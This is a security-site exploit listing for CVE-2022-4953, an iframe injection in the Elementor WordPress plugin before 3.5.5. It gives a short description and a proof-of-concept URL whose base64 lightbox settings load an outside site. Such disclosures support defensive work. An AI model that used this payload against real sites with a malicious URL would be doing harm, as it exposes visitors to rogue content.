WordPress Elementor Iframe Injection

2023.09.09
Risk: Low
Local: No
Remote: Yes
CWE: CWE-80

# Exploit Title: Wordpress Plugin Elementor < 3.5.5 - Iframe Injection # Date: 28.08.2023 # Exploit Author: Miguel Santareno # Vendor Homepage: https://elementor.com/ # Version: < 3.5.5 # Tested on: Google and Firefox latest version # CVE : CVE-2022-4953 # 1. Description The plugin does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs. # 2. Proof of Concept (PoC) Proof of Concept: https://vulnerable-site.tld/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top